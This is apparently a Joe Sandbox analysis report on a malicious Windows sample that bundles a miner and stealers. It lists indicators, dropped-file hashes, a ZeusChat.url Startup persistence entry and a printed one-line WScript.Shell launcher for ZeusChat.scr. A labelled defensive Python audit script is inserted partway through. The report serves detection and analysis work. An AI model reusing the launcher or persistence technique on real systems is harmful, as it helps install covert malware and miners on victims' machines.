IP | Domain | Country | Flag | ASN | ASN Name | Malicious
163.172.171.111 | xmr-eu2.nanopool.org | United Kingdom | | 12876 | OnlineSASFR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561926
Start date and time: 2024-11-24 20:24:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.expl.evad.mine.winEXE@38/58@3/1
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 53%
• Number of executed functions: 29
• Number of non-executed functions: 340
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ZeusChat.scr, PID 4444 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtSetInformationFile calls found
• VT rate limit hit for: file.exe
Time | Type | Description
14:24:57 | API Interceptor | 1x Sleep call for process: file.exe modified
14:26:37 | API Interceptor | 2151x Sleep call for process: explorer.exe modified
20:25:06 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url
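The persistence mechanism recorded above is a .url file in the per-user Startup folder, which the shell opens at logon like any other Internet Shortcut. The report names the file but does not show its contents, so the added example below (not Joe Sandbox code) assumes ZeusChat.url is an ordinary [InternetShortcut] whose URL= line points at the dropped ZeusChat.scr under %LOCALAPPDATA%; the fixture written by demo() is constructed on that assumption. The audit itself is generic: it parses every .url in a Startup folder and reports targets that are local executables or scripts, or that live in user-writable directories.

```python
"""Audit a Startup folder for .url launchers that point at local executables.

Added example for this report, not Joe Sandbox code. The report only names the
persistence entry (...\Startup\ZeusChat.url); its contents are not shown, so the
fixture in demo() assumes a plain InternetShortcut whose URL= line targets the
dropped ZeusChat.scr. Run scan_startup() against a real profile to audit it.
"""
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote, urlparse

# Startup folder relative to the user profile, as in the report's Autostart entry.
STARTUP_REL = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")

# File types the shell will execute when the shortcut target is "opened".
EXEC_EXTENSIONS = {".scr", ".exe", ".com", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".ps1"}

# Places an unprivileged dropper can write; legitimate autostarts rarely live there.
USER_WRITABLE_MARKERS = ("\\appdata\\local\\", "\\appdata\\roaming\\",
                         "\\temp\\", "\\users\\public\\")


def parse_url_shortcut(text: str):
    """Return the URL= value from the [InternetShortcut] section, or None."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and line[:4].upper() == "URL=":
            return line[4:].strip()
    return None


def local_path(url: str):
    """Map file:///C:/... (or a bare C:\\... path) to a Windows path; None for web URLs."""
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    if len(scheme) == 1:                 # "C:\..." parses as scheme 'c'
        return url
    if scheme != "file":
        return None
    path = unquote(parsed.path)
    if len(path) > 2 and path[0] == "/" and path[2] == ":":
        path = path[1:]                  # "/C:/Users/..." -> "C:/Users/..."
    return path.replace("/", "\\")


def assess(url: str) -> list:
    """Reasons a Startup .url target looks like a launcher (empty list = nothing found)."""
    path = local_path(url)
    if path is None:
        return []
    low = path.lower()
    reasons = []
    ext = os.path.splitext(low.rsplit("\\", 1)[-1])[1]
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"target is executable ({ext})")
    if any(marker in low for marker in USER_WRITABLE_MARKERS):
        reasons.append("target lives in a user-writable directory")
    return reasons


def scan_startup(startup_dir: Path) -> list:
    """Parse every .url in the folder and attach the reasons it looks suspicious."""
    findings = []
    for shortcut in sorted(startup_dir.glob("*.url")):
        url = parse_url_shortcut(shortcut.read_text(errors="replace"))
        if url is None:
            continue
        findings.append({"shortcut": shortcut.name, "target": url, "reasons": assess(url)})
    return findings


def demo() -> list:
    """Constructed fixture: the assumed ZeusChat.url plus an ordinary web shortcut."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "ZeusChat.url").write_text(
            "[InternetShortcut]\n"
            "URL=file:///C:/Users/user/AppData/Local/CyberSphere%20Dynamics/ZeusChat.scr\n")
        (folder / "Docs.url").write_text("[InternetShortcut]\nURL=https://example.com/\n")
        return scan_startup(folder)


if __name__ == "__main__":
    profile = Path(os.environ.get("USERPROFILE", ""))
    target = profile / STARTUP_REL if profile.name else None
    results = scan_startup(target) if target and target.is_dir() else demo()
    for finding in results:
        print(finding["shortcut"], "->", finding["target"], "|",
              "; ".join(finding["reasons"]) or "no findings")
```

Scanning the .url files is cheap because the format is plain INI text; .lnk entries in the same folder need a shell-link parser and are out of scope here, but the same two questions (is the target executable, does it live somewhere the user can write) apply to them.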
Match | Associated Sample Name / URL | Detection | Threat Name
163.172.171.111 | E5r67vtBtc6.exe | malicious | Xmrig
163.172.171.111 | Miner-XMR2.exe | malicious | Xmrig
163.172.171.111 | file.exe | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Xmrig
163.172.171.111 | zg9ZjvXyS0.exe | malicious | Xmrig
Match | Associated Sample Name / URL | Detection | Threat Name | Context
xmr-eu2.nanopool.org | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 51.15.89.13
xmr-eu2.nanopool.org | file.exe | malicious | Xmrig | 51.195.43.17
xmr-eu2.nanopool.org | file.exe | malicious | Xmrig | 51.15.61.114
xmr-eu2.nanopool.org | ICBM.exe | malicious | Xmrig | 51.15.61.114
xmr-eu2.nanopool.org | ICBM.exe | malicious | Xmrig | 51.68.137.186
xmr-eu2.nanopool.org | ICBM.exe | malicious | Xmrig | 51.68.137.186
xmr-eu2.nanopool.org | ICBM.exe | malicious | Xmrig | 51.195.138.197
xmr-eu2.nanopool.org | ICBM.exe | malicious | Xmrig | 51.195.43.17
xmr-eu2.nanopool.org | ICBM.exe | malicious | Xmrig | 51.210.150.92
xmr-eu2.nanopool.org | file.exe | malicious | Xmrig | 163.172.171.111
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OnlineSASFR | https://og.oomaal.in/ | malicious | Unknown | 163.172.253.2
OnlineSASFR | sparc.nn.elf | malicious | Mirai, Okiru | 151.115.247.92
OnlineSASFR | Lreticupdwy.exe | malicious | Unknown | 62.210.129.110
OnlineSASFR | Lreticupdwy.exe | malicious | Unknown | 62.210.129.110
OnlineSASFR | mips.nn.elf | malicious | Mirai, Okiru | 212.129.25.56
OnlineSASFR | XzCRLowRXn.exe | malicious | Unknown | 51.158.201.235
OnlineSASFR | Unit 2_week 4 2024.pptx | malicious | HTMLPhisher | 212.129.3.113
OnlineSASFR | TT copy.exe | malicious | FormBook | 195.154.200.15
OnlineSASFR | amen.x86.elf | malicious | Mirai | 151.115.247.87
OnlineSASFR | mNtu4X8ZyE.exe | malicious | Emotet | 51.15.7.145
                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | file.exe | malicious | Xmrig
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | SecuriteInfo.com.Win32.Malware-gen.8775.19492.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | O8scEm3rJN.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | KeyFormed.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | wWk9NkXYcL.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | 7CTH165fQv.exe | malicious | Latrodectus
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Fj8bSgJTob.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Fj8bSgJTob.exe | malicious | Unknown
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | file.exe | malicious | Xmrig
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | SecuriteInfo.com.Win32.Malware-gen.8775.19492.exe | malicious | Unknown
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | O8scEm3rJN.exe | malicious | Unknown
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | KeyFormed.exe | malicious | Unknown
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | wWk9NkXYcL.exe | malicious | Unknown
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | 7CTH165fQv.exe | malicious | Latrodectus
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Fj8bSgJTob.exe | malicious | Unknown
C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Fj8bSgJTob.exe | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
File Type: data
Category: dropped
Size (bytes): 3677337
Entropy (8bit): 7.999944173773252
Encrypted: true
SSDEEP: 98304:Sd+C1vXUPV85t2oyHCO+0WKt1M3ymwbvVraEB0jPnyk5pKgVKCn:Sd+6vXUKyoU+0WKt1MCmAraEsf95MYn
MD5: C5718114F703C816800F6BBFDA267EF6
SHA1: 2608C20BA78181641E8A396295DD6F920546DFC6
SHA-256: F7896C752B429245764E615DEF6319D3790688F7694A493304B4A40599F9F335
SHA-512: E38E5A3949EF87294ECD705EF27A727B1A139F89F0D5EB4184AB4EB4009CFC58213C746176139220DB1F0AF756316912654AD7A037225FF3329A044B32B80B8B
Malicious: true
                                                                                                    Preview:.I.h....N.N..04vT..6......@..W..o...5xRz.)...I..i...WO...f..?.....y....t.f.:E^..r..x.(...q.;.n...A-..6.....~ ..w/...v.P..O...g_.Sx.E.."\..6h.~....~..V"...Z....`.+....e...M.E.P....ck!.T...AM....R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.L.'.F...h..............>.......>......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.&..,P..Myn.2..t.W....^.8.Z!...W[.>..8D...>...i..m......_.}8.5...x..2).U.j....R>..#.~.\.......$h_.8..D..X.U..~X...)<.G...]...P9(..f/.._..c.Y.^...g[.T.bg.D....w$ .x9...#.K..{).....A...V*..!.+.f./J>I5.._yN`.7l..M.....a2.....||>...z.QRG........K.G..;.rda(..{.l5<...d...Q.....x.=.4..W?_8.<Oj<..;...hy.C.."x....x....g..0.Q..i. /.j...v8...iH.>...
Process: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 179
Entropy (8bit): 4.71590743776702
Encrypted: false
SSDEEP: 3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5mcVI9zRLBpHFZo5uWAX+aJp6/h4EkD5mcf:RiJBJHonwWDaJ0/hJkDR6VRLvHFywWDS
MD5: BF7E76FB66EBF1EB9824F7FF48B31194
SHA1: C0D778C07BFCD6474209761EC7A0818B72AD6E9D
SHA-256: AE70150097558C8B2178AF62EBA146A0A66CAA99EE1C6E443A7FCC094536CA60
SHA-512: 3905C7D7D05B8D11F8DD7688C5912E3D60DD4BE617A199582A7503308F1299300AB464EAF1D67BDE3105492F713ECE73176CC5764067656125D629A52B7F609A
Malicious: true
                                                                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CyberSphere Dynamics\\ZeusChat.scr\" \"C:\\Users\\user\\AppData\\Local\\CyberSphere Dynamics\\M\"")
Process: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1065128
Entropy (8bit): 6.43820773264071
Encrypted: false
SSDEEP: 24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
MD5: C63860691927D62432750013B5A20F5F
SHA1: 03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
SHA-256: 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
SHA-512: 3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.8775.19492.exe, Detection: malicious
• Filename: O8scEm3rJN.exe, Detection: malicious
• Filename: KeyFormed.exe, Detection: malicious
• Filename: wWk9NkXYcL.exe, Detection: malicious
• Filename: eSLlhErJ0q.exe, Detection: malicious
• Filename: 7CTH165fQv.exe, Detection: malicious
• Filename: Fj8bSgJTob.exe, Detection: malicious
• Filename: Fj8bSgJTob.exe, Detection: malicious
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1065128
Entropy (8bit): 6.43820773264071
Encrypted: false
SSDEEP: 24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
MD5: C63860691927D62432750013B5A20F5F
SHA1: 03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
SHA-256: 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
SHA-512: 3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.8775.19492.exe, Detection: malicious
• Filename: O8scEm3rJN.exe, Detection: malicious
• Filename: KeyFormed.exe, Detection: malicious
• Filename: wWk9NkXYcL.exe, Detection: malicious
• Filename: eSLlhErJ0q.exe, Detection: malicious
• Filename: 7CTH165fQv.exe, Detection: malicious
• Filename: Fj8bSgJTob.exe, Detection: malicious
• Filename: Fj8bSgJTob.exe, Detection: malicious
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\cmd.exe
File Type: data
Category: dropped
Size (bytes): 3677337
Entropy (8bit): 7.999944173773252
Encrypted: true
SSDEEP: 98304:Sd+C1vXUPV85t2oyHCO+0WKt1M3ymwbvVraEB0jPnyk5pKgVKCn:Sd+6vXUKyoU+0WKt1MCmAraEsf95MYn
MD5: C5718114F703C816800F6BBFDA267EF6
SHA1: 2608C20BA78181641E8A396295DD6F920546DFC6
SHA-256: F7896C752B429245764E615DEF6319D3790688F7694A493304B4A40599F9F335
SHA-512: E38E5A3949EF87294ECD705EF27A727B1A139F89F0D5EB4184AB4EB4009CFC58213C746176139220DB1F0AF756316912654AD7A037225FF3329A044B32B80B8B
Malicious: true
                                                                                                    Preview:.I.h....N.N..04vT..6......@..W..o...5xRz.)...I..i...WO...f..?.....y....t.f.:E^..r..x.(...q.;.n...A-..6.....~ ..w/...v.P..O...g_.Sx.E.."\..6h.~....~..V"...Z....`.+....e...M.E.P....ck!.T...AM....R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.L.'.F...h..............>.......>......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.&..,P..Myn.2..t.W....^.8.Z!...W[.>..8D...>...i..m......_.}8.5...x..2).U.j....R>..#.~.\.......$h_.8..D..X.U..~X...)<.G...]...P9(..f/.._..c.Y.^...g[.T.bg.D....w$ .x9...#.K..{).....A...V*..!.+.f./J>I5.._yN`.7l..M.....a2.....||>...z.QRG........K.G..;.rda(..{.l5<...d...Q.....x.=.4..W?_8.<Oj<..;...hy.C.."x....x....g..0.Q..i. /.j...v8...iH.>...
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 64512
Entropy (8bit): 7.997410116453677
Encrypted: true
SSDEEP: 768:p2pG4gYr39J5QO8CifS5JEvkX0rdE0XxYav4npFMxs6RVmyqSpLGeNzqDdr2UosR:CG4gYzCO8CzuvnLxZ/f32drtOaQVTQ
MD5: 88A17BE0C7D698A8222DA655CEC1985F
SHA1: 2517799B7A0881C360EF0BAE427508FDEA450444
SHA-256: 2F57B20C75DA4681D05B98A6B3B20276395FB549BC035AEC4DAE6D3671231E73
SHA-512: C96F85878FFF7328134F85EE1C4849D82484C960185CE04FAFB89894E51CFDF2B7AF81A72AFED2D2A1E604351EA3D0F8BE8852FF5FC221306718D167D48CB67B
Malicious: true
                                                                                                    Preview:.Q.*=..R...a]....-........)!.Lx1..Y..ZL.%.(q>.c.._$.{.9.;...k......e.al.2.&.2..(.oRI..{...{.w.......U..I....v2o.......h..!s6.sw...9...a.5i?gM>..../h..4..A.:.:.@......f.(...ps< F.T.9b%M.6..F4.6?....~..tV.U.=J..C.......U.z9,..=...<t.p.....v.".J..t_-...N....d.....0,...COG.,.......ni<[..#.@...a.;r.p..l4.k.....FN..J.u.P....zqJ..q...U........].ym."W....0.d\..*?g.;....@75.....Y...!.V2y.Y.W...G.]...G..M..g.j.t2...-.MO.&..m.t...!h:.8..s1...?z....0......W._..l.p...-.{.iw....K..b2..v.3vw.R.....H.w....l.Q.5....h|N.#wW.|...%ho.....Z.6.R...w2~.asiLNm.7.....Yy.8...P.=B.P=b)<.!...Q...<..`P.E(.J....}UTo....P..PG.7..g.......YF......f...H.7A.q..:..?O...D...2..`.|.'G....aH.M....X.....C}..:..^...$...A c~.np2n......w....=.c.!.2..).?..`..=s..I.H.0#.).W....l......8..K-..'D....R...&+.:.z....$.@..e...t.>..B.CM.}R....[..L=M]%-.3.?........e.._vkEz.M.:u.....Ap..a.B..|M..]I{lx...n.G...:....Kp...0........:...Vo..........*'..s...m]".....N.N)..f.ve..j87Q9Y.,..i.Q
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73728
                                                                                                    Entropy (8bit):7.9976461887667
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:OqKZtFBQ4yLVvzRHvrBSuKeBkzzmgfgfJH1XHnjdua:Oq23BQLfP9SuKlRfERx
                                                                                                    MD5:1C5BCCD3C6CEBB00CE3E1563C51BBEA5
                                                                                                    SHA1:7109CE0ADB4C3338A0A8AD12D29D94F885D80C8C
                                                                                                    SHA-256:9B5547FE418E6B43A52E59E1D64964D1301168283556F2FF30BBB6113BED0554
                                                                                                    SHA-512:6AA079DFFB9199FA596EB83CBE6F80BEA8EC95C069CEE9D14C44877E5E4E3A0E8C39F94FC832AAE5C3B2AD4966BE6FA49DD2D9B51ABB4FC1266E776B8218D66F
                                                                                                    Malicious:true
                                                                                                    Preview:.....|{.l;.....p..0.....n...F..?wHCm\.9....q..2..@/;......o=..y..8...@W......z..q..l.o...f.:../.....5...a.R..w..V..7..?m.E.......hz.dq..^.j.S....}..E.&...Z......g^..S..^....o>.....m..So...e:..R.j.7.z.`W..5..U.........f6....LUs..!.-..k..H...0 ..C...9.<.~......c0..c.t*`.\..xr...G,...A..+.....n\...A....5.O.FI.....a..zP....0..7t.+...q.r.R...zr..;"|.....R........U[..\t{H......J../je...u.]..(Rn....?...).......Q......s..J.#..Fx..p.KI.}.Txy..5..v.x.vZ....F.M.8.....y.....O]...).Gv.....z.,.[...M..|.pl......P6U..W.....5y...?.KA....F...Tt.<..0](!..B..\...yL=.aR..`..(#....h=..3P[.pTw...[.].,.$..T...u_.?....f.^..B..w`..-@+5...T......~..0.O.I./).NZ.d..gP...wFy.1a.B..K.+.."=..7B.{.GPL....$_...d..E......<..y....4.....~Y...@. ..8W..;<y.4....u...Gs...d.*....~..5..P.:.UY.Z..H.s...P...N.....|.f.......P.....W.R..S&.D.*..\..7Y.p...P..X.\.f)#..N.......'.)...E..C..Z_...........q...S..1[%....ac..W.z./...b.....E.<d7...G.t.%...Tk.;E,.I.......eJi/.......m.
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):83968
                                                                                                    Entropy (8bit):7.9976001147327125
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:7P1bpShADfQc/58M2DMF1Z3XqKx4O9BUrC+JpsADRfRgfG0k/jFdTG5:7P1whADfQ0P/fhXqmb9m2eAIT6
                                                                                                    MD5:344621DEA0EE974945ADCEE99B5BD517
                                                                                                    SHA1:536F9C1AD6081983670AFB4F7E88E648E24175BB
                                                                                                    SHA-256:D1BC6E174CC46F6E8D242378B5A38A34CED585ED8D294A1D1079A7DEC9A6237D
                                                                                                    SHA-512:8864F337AB431CF28B147EE3E74E9D971332825658587C5215BA47D9A6FF1392FA7EF5C3BFF3CF38BCACB15B662540400A497445583B4B77B81D81BB5694E310
                                                                                                    Malicious:true
                                                                                                    Preview:.rnr..<.g*..o.^..p...h..t(k|...cLU...........s./.G..0.....e.J.9?....!.w..2'.$`...o.I..-...r..Ev].LmA.......MD.w..>...G.-a.;.o$.h..#.....8..;.M.K.....A.....E....}e......P.u._..z.@[dq...$.......P.dv@f.8a .`\.,...W@.&.".3.X..Z#....`6x=`ZhXw....|...n.s.U=.t...x<a.....[.jk......b..6..../.6.:.s.z..*ix.)..47O......].._..-.....\.Q..n?.\.Z.,....^..nD}.w....j..B..}6i.o.c...^......MW....2..u......o.|.5......j.K.@d..Xco".2X...euH........f..V...N..N4....\.]Za1........O`^Z...sU..Ft...|.yR.o.".f.U..+..X8.....n..=..X.3.....Y...w....E..&'....M...UJM....}q9=..S......Q....[4.zpL.,')......NiV....j..y..%".FT{W...d.V1...f...r.....:.....)M..^X.H.a.GF.y..s.qx.w...~.|.66......j...;Xm.T..A..t............y.@.Ps~PN.D...F.....s.$h..x.9Dk...I....m.d..m.._=VMg...a......y.<..S.'L.....6J...5....i..)Z...+.#9..Y...\..,4..r?."oL.....d.^....+..[.Bzl.........}&.(..Y.f?$g.."......V...1...Y....h..ees....^....-.D....0.7...d....9.s ...r~s.r.K..l..F..t M.p.Z.$7.s.a..Ps.L./..
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96256
                                                                                                    Entropy (8bit):7.998160366275236
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gTEnlZ1AxGpyKOALxCqREIv7CoAzVxeX5t99O5o9AagdBIxDIcZeL2Gx5:gTS8GgKrdCWEIDxyveXBOaWeSD2G
                                                                                                    MD5:E4A02EA210673BA79BC58DC5B99394E1
                                                                                                    SHA1:9B374BEC27EC9B87440841460678C6F2E1240687
                                                                                                    SHA-256:7FE058D75C2BF56E1D9CBBD95CE11BAC0468FA4A5AB1AC8EB001F9D5D4A5D527
                                                                                                    SHA-512:EE99AA3FA5E558C6906852563FD06DF9628E0D0DC3EFCA6D228E1AC164753920FE52BB26E1B3FB8F59B05C9EDD2922D9556D9B43297BB9E45F65D0C48601020F
                                                                                                    Malicious:true
                                                                                                    Preview:..'.i.!=... .........DE....8e.F..2...K...**.s.....;s.-...5...M......h}.......C'......^2.0.......@.6.=y..S....4~.T.&47.P.{...7..YI.8....(.4...Yi.g.<Hx.tJT.f..Z.[wNw...Ge.......(........(.c..z..r.*...../...;+!J2..n...!K.DS.YE-;....}.....-.Y..Rb2.... .G.JA..*.2...(......SB.y'dU$.!JcCk..8....0.JC.t."G.*...!....P.....^^.. .....*v.c..W.... .rX!...c.6..~.:(A........ADg.....,.K.y...y..6.t...7../...R.i.......j:......~.G.h.Ff.B..._...6f?/U...5....]VQ.sX.V.#....J..e..Cp..8...(..h...F.'YH.e`.fH.\`....z..x.Y..F.X..W...$&..Bu..1..x^.c._F..X.*.oH...:W0.!_Z.r.....*|..M.T~.Gd.F......=.B.Qw.E_..'Y..t.e-X.!.t.2.@B..qK.HZ...^...].n.b .].'8..czN.....B2A. .....RS.7@*4..........+...4..1..sK......I!.X.:.~.O~.v..Bd.=2..Dw...c...P....$.0....djn..ipl..i{W...+.~.B]|....yR?...QM_.$...w.....Z.c...........y.[,..R...I..u.1...../.F...E...&..>..\.^.(..R.}../.+.2.B..V0e..w...j.%{....w...".....E....5...h.Z....E..UO....O...9..B.3.v...T......c...6..d..J6_....X..
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53248
                                                                                                    Entropy (8bit):7.996215389321042
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:/UnGAxu8gquJEkHvCI2+LOuvf4MzvQz3qRFJFMMtzGL8H3z:QG38gq9UvtLjvfhrQz3qzcLMz
                                                                                                    MD5:F92CDDF1D49EC73A6C6C25381A483216
                                                                                                    SHA1:01624E525D479F595668D2A886A2A9686726C0BA
                                                                                                    SHA-256:7C6DFC44CF89D81B573C099D4714F9740E53C3BF21058ABB0C59E22DE31D3AAB
                                                                                                    SHA-512:EA575D28AEC3A4288523DE876F3C8609F20AF984B80B00DA40D0782230FAE408E00E99ABCABA7B2D0AFDCB305449E8516F6DC507AAA455E97AB4990AAB6426B7
                                                                                                    Malicious:true
